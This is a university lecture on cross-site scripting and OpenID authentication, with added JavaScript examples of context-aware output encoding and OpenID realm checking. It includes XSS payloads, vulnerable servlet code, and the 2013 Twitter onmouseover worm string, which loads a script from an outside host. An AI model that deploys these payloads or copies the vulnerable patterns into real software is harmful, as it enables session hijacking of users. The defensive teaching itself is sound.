Web Application Security + OpenID NWEN 304: Advanced Network Applications.

1 Web Application Security + OpenID NWEN 304: Advanced Network Applications

2 Info
- ICT Careers fair on Friday
- Tech report out today
- Teaching evaluations
- Groups

3 Cross-site scripting (XSS)
An injection vulnerability, usually classed as an input validation failure (the root cause is output that is written into a page without being encoded for its context). Allows an attacker to inject client-side code (JavaScript) into web pages. This is then served by a vulnerable web application to other users and runs in their browsers with the application's origin and their session.

4 Reflected XSS
The injected code is reflected off the web server:
- an error message,
- a search result,
- any response that includes some/all of the input sent to the server as part of the request.
Only the user issuing the malicious request is affected (so the victim has to be lured into following the crafted link).

Vulnerable servlet code (the attacker-controlled parameter is written straight into the HTML):

    String searchQuery = request.getParameter("searchQuery");
    ...
    PrintWriter out = response.getWriter();
    out.println("<p>" + "Results for (" + searchQuery + ")</p>");

User request: searchQuery=<script>alert("pwnd")</script>

5 Stored XSS
The injected code is stored on the web site and served to its visitors on all page views:
- user messages,
- user profiles.
All users affected.

Vulnerable servlet code (the stored message is written straight into the HTML):

    String postMsg = db.getPostMsg(0);
    ...
    PrintWriter out = response.getWriter();
    out.println("<p>" + postMsg + "</p>");

Stored postMsg: <script>alert("pwnd")</script>

6 Solution for injection: sanitization
Sanitizing all user inputs is difficult. Why?
Sanitization is context-dependent; the same string needs different treatment in each of these positions:
- JavaScript value: var q = 'user input';
- CSS value: a:hover { color: user input }
- URL value: <a href="user input">
Sanitization is attack-dependent, e.g.
- JavaScript (XSS)
- SQL (SQL injection)
Blacklisting vs. whitelisting
Roll-your-own vs. reuse

7 Roll-your-own: example
On Twitter, if a user posts www.site.com, Twitter displays it as a link: www.site.com
Twitter's old sanitization algorithm blocked < but allowed ". What happens if somebody tweets:

    http://t.co/@"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/

Twitter displays: … (the " closes the href attribute of the generated link, so the rest of the tweet becomes an onmouseover attribute on that link)
http://www.htmlgoodies.com/beyond/javascript/article.php/3470771

8 Roll-your-own: example
Anyone putting the mouse over such a tweet will run JavaScript that posts a similar message to their own feed (a self-propagating, stored XSS worm).
The actual attack used:

    http://t.co/@"style="font-size:999999999999px;"onmouseover="…/

Why the style part? The enormous font size makes the link cover the whole page, so almost any mouse movement fires the onmouseover handler without the user clicking anything.

9 Roll-your-own: example This is what it looked like:

10 Reuse: example
jQuery has built-in support: the .text() method for element content and .val() for form input values. Setting content with .text() inserts it as a text node rather than as HTML, so the browser does not interpret markup in the string; when serialised, the characters appear escaped:
- & becomes &amp;
- < becomes &lt;
- > becomes &gt;
(.html() does the opposite and must never receive untrusted input.)
http://api.jquery.com/text/
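Added example, not code from the lecture: one encoder per output context from slide 6, applied to the reflected-XSS servlet of slide 4 (rewritten here in JavaScript) and to the Twitter link bug of slides 7 and 8. The function names and the two payloads are this example's own, constructed to resemble the slides, not the original tweets.

```javascript
'use strict';
// Added example (not from the slides): context-aware output encoding.
// A single "strip <" blacklist, as in the Twitter incident, leaves the
// attribute context open; each context below gets its own encoder.

// 1. HTML text context: between tags, e.g. <p>Results for (QUERY)</p>
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 2. HTML attribute value context, e.g. <a href="VALUE">. Every
//    non-alphanumeric character is encoded, so the value can never close
//    its quote or start a new attribute such as onmouseover=.
function escapeHtmlAttr(s) {
  return Array.from(String(s), (ch) =>
    /^[A-Za-z0-9]$/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`
  ).join('');
}

// 3. JavaScript string literal context, e.g. <script>var q = VALUE;</script>.
//    Returns a quoted literal; <, >, & and the line separators are
//    \u-escaped so the input cannot contain </script> or break the literal.
function escapeJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// 4. URL context: whitelist the scheme. javascript:, data: and anything
//    that does not parse as an absolute URL is rejected (null).
function safeUrl(s) {
  let u;
  try { u = new URL(String(s)); } catch (e) { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
}

// Slide 4's search page, hardened: the query is encoded for the text context.
function renderResults(searchQuery) {
  return `<p>Results for (${escapeHtml(searchQuery)})</p>`;
}

// The "block < and > but allow the quote" blacklist of slides 7-8 ...
function naiveStrip(s) { return String(s).replace(/[<>]/g, ''); }
function renderLinkNaive(url) {
  const u = naiveStrip(url);
  return `<a href="${u}">${u}</a>`;
}
// ... and the link rendered with a scheme whitelist plus per-context encoding.
function renderLinkSafe(url) {
  const u = safeUrl(url);
  if (u === null) return escapeHtml(url); // not a link we are willing to emit
  return `<a href="${escapeHtmlAttr(u)}">${escapeHtml(u)}</a>`;
}

// True if the rendered HTML contains an event-handler attribute.
function hasEventHandlerAttr(html) {
  return /["'\s]on\w+\s*=/i.test(html);
}

// Constructed payloads modelled on the slides.
const XSS_QUERY = '<script>alert("pwnd")</script>';
const LINK_PAYLOAD = 'http://t.co/@"onmouseover="alert(1)"/';

console.log(renderResults(XSS_QUERY));
console.log(renderLinkNaive(LINK_PAYLOAD), hasEventHandlerAttr(renderLinkNaive(LINK_PAYLOAD)));
console.log(renderLinkSafe(LINK_PAYLOAD), hasEventHandlerAttr(renderLinkSafe(LINK_PAYLOAD)));
```

The attribute encoder is deliberately more aggressive than the text encoder: in an attribute value the dangerous characters depend on which quote (if any) the template author used, so encoding everything but letters and digits removes that dependency. Note that safeUrl alone is not enough for the Twitter case; the WHATWG parser percent-encodes the quote, but the value still has to go through escapeHtmlAttr before it lands in href.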

11 Now: OpenID
Terminology:
- Identity
- Authentication
- Authorisation
- OpenID

12 Identity
A set of attributes related to an entity.
Entity attributes: name, address, sex, height, etc.
Identities: work, personal, private

13 Identity

14 Authentication
Positive verification of identity. Authentication factors:
- What you know: PIN/password
- What you have: token/certificate/RFID
- Who you are: biometric

15 Authorisation
Authorisation determines whether an entity is allowed to perform a given activity. It typically builds on authentication: you first establish who the entity is, then look up what it may do.
Protocols like OAuth let a third-party application access a user's protected data (across domains) without that application having to authenticate the user itself or hold the user's password.

16 OpenID, OAuth, and OpenID Connect
- OpenID = Authentication: making sure the user is who they say they are
- OAuth = Authorisation: deciding what the user (or an app acting for them) is allowed to do; an "access granting protocol" (more on this next time)
- OpenID Connect = Authentication, but built on OAuth 2.0

17 Password Management: Adobe
The ten most common entries from the 2013 Adobe breach (number of users, stored ciphertext, recovered plaintext):

 #    Count    Ciphertext                 Plaintext
 1.  1911938   EQ7fIpT7i/Q=               123456
 2.   446162   j9p+HwtWWT86aMjgZFLzYg==   123456789
 3.   345834   L8qbAD3jl3jioxG6CatHBw==   password
 4.   211659   BB4e6X+b2xLioxG6CatHBw==   adobe123
 5.   201580   j9p+HwtWWT/ioxG6CatHBw==   12345678
 6.   130832   5djv7ZCI2ws=               qwerty
 7.   124253   dQi0asWPYvQ=               1234567
 8.   113884   7LqYzKVeq8I=               111111
 9.    83411   PMDTbP0LZxu03SwrFUvYGA==   photoshop
10.    82694   e6MPXQ5G6a8=               123123

Every user with the same password has the same stored value, so the column can be counted and matched against hints without knowing any key. Rows 2 and 5 share a leading block and rows 3, 4 and 5 share a trailing block: the signature of a block cipher in ECB mode with no salt, rather than a salted password hash.

18 OpenID 1.0/2.0
Started around 2005.
Motivation:
- Users have accounts all over the Web
- User profiles are distinct
- Multiple passwords problem
Goal: apps/sites can leverage an OpenID provider, a third-party authentication service (federated login). Users have one account at the provider.

19 OpenID 1.0/2.0
Decentralised mechanism for authentication; the OpenID protocol describes the authentication process.
An OpenID:
- *is* a URI, e.g. http://ryan.myopenid.com/
- The user is in control and selects the URI
- Pick a provider you trust, similar to choosing an e-mail provider
- Use your own domain (and delegate the actual process to another identity provider)
- Have multiple identities
OpenID Providers: Google, Yahoo!, etc., or yourself (run your own server)

20 OpenID 1.0/2.0
You can claim you own the URI → you can prove you own the URI → you can use it to authenticate yourself on other websites → you don't need to have an account on a new website.
It can also be extended to include profile information and claims.

21 How it works
XRDS (eXtensible Resource Descriptor Sequence): the XML format of the discovery response. The relying party fetches it for the user's OpenID URI; it describes the provider endpoint to which login requests are sent.
Credit: https://edux.fit.cvut.cz/oppa/MI-W20/prednasky/w20-9.pdf

22 How it works
The user authenticates with the OpenID provider. Example request to Google's OpenID provider:

    https://www.google.com/accounts/o8/id
      ?openid.ns=http://specs.openid.net/auth/2.0
      &openid.return_to=https://www.example.com/checkauth
      &openid.realm=http://www.example.com/
      &openid.assoc_handle=ABSmpf6DNMw
      &openid.mode=checkid_setup

- ns: protocol version (the endpoint itself is obtained from the XRDS discovery document)
- mode: type of message or additional semantics (checkid_setup = interactive login, the user may be prompted)
- return_to: callback page to which the provider sends the (signed) result
- realm: the URL pattern the user is asked to trust; return_to must lie within it
- assoc_handle: handle of the association (shared secret) previously established between the web app and the provider, used to sign the response and let the web app verify it
Credit: https://edux.fit.cvut.cz/oppa/MI-W20/prednasky/w20-9.pdf
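Added example, not code from the lecture: building the checkid_setup request shown above and enforcing the OpenID 2.0 realm-matching rule (return_to must lie within the realm, otherwise the signed assertion could be delivered to a site the user never agreed to trust). The endpoint, parameter names and values are the slide's; the function names are this example's own. One caveat the example makes visible: the slide's sample uses https for return_to but http for the realm, which the spec's rule (same scheme and port) rejects, so the matching realm would be https://www.example.com/.

```javascript
'use strict';
// Added example (not from the slides): OpenID 2.0 request construction
// and the return_to / realm check from the spec's "Realms" rules.

const OPENID_NS = 'http://specs.openid.net/auth/2.0';

// Does return_to match the realm? The rule applied here: same scheme and
// port; return_to path equal to or under the realm path; host equal to the
// realm host, or, when the realm host starts with "*.", that domain or a
// sub-domain of it (on a "." boundary, so "*.example.com" does not match
// "evilexample.com"). A realm must not carry a fragment.
function returnToMatchesRealm(returnTo, realm) {
  const wildcard = /^[a-z][a-z0-9+.-]*:\/\/\*\./i.test(realm);
  const realmNoStar = wildcard ? realm.replace('://*.', '://') : realm;
  let r, t;
  try { r = new URL(realmNoStar); t = new URL(returnTo); } catch (e) { return false; }
  if (r.hash !== '') return false;
  if (r.protocol !== t.protocol || r.port !== t.port) return false;
  const base = r.pathname.endsWith('/') ? r.pathname : r.pathname + '/';
  if (t.pathname !== r.pathname && !t.pathname.startsWith(base)) return false;
  if (wildcard) {
    return t.hostname === r.hostname || t.hostname.endsWith('.' + r.hostname);
  }
  return t.hostname === r.hostname;
}

// Build the redirect to the provider's endpoint. The relying party refuses
// to build a request the provider would (rightly) reject.
function buildCheckidSetup(endpoint, { returnTo, realm, assocHandle }) {
  if (!returnToMatchesRealm(returnTo, realm)) {
    throw new Error('openid.return_to does not match openid.realm');
  }
  const u = new URL(endpoint);
  u.searchParams.set('openid.ns', OPENID_NS);
  u.searchParams.set('openid.mode', 'checkid_setup');
  u.searchParams.set('openid.return_to', returnTo);
  u.searchParams.set('openid.realm', realm);
  if (assocHandle) u.searchParams.set('openid.assoc_handle', assocHandle);
  return u.href;
}

// Read the openid.* parameters back out of a request URL (what the
// provider does first), with the "openid." prefix stripped.
function parseOpenidParams(url) {
  const out = {};
  for (const [k, v] of new URL(url).searchParams) {
    if (k.startsWith('openid.')) out[k.slice('openid.'.length)] = v;
  }
  return out;
}

// The slide's request with the realm scheme corrected to match return_to.
const EXAMPLE_REQUEST = buildCheckidSetup('https://www.google.com/accounts/o8/id', {
  returnTo: 'https://www.example.com/checkauth',
  realm: 'https://www.example.com/',
  assocHandle: 'ABSmpf6DNMw',
});
console.log(EXAMPLE_REQUEST);
console.log(parseOpenidParams(EXAMPLE_REQUEST));
```

The provider performs the same check before showing the user "Do you trust www.example.com?", and the relying party must additionally verify the signature on the response with the secret behind assoc_handle and check that the returned return_to is one of its own; a realm check alone does not authenticate the response.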

23 OpenID 1.0/2.0 Limitations
- Never really adopted
- Works for websites, but not native apps/mobile
- Difficult to implement (properly)
- URIs are hard for many users to understand and remember
- Relies on XML

24 OpenID Connect
Third iteration of OpenID, released 2014. An identity layer on top of OAuth 2.0.
Much more developer friendly: leverages standard TLS infrastructure + JSON + REST = better interoperability and adoption.
Designed for mobile/apps etc.
Scalable security: levels of assurance (LoA 1 to 4).
User identifiers can be based on e-mail addresses rather than URIs.

25 OpenID Connect

26 Next time OAuth and you.
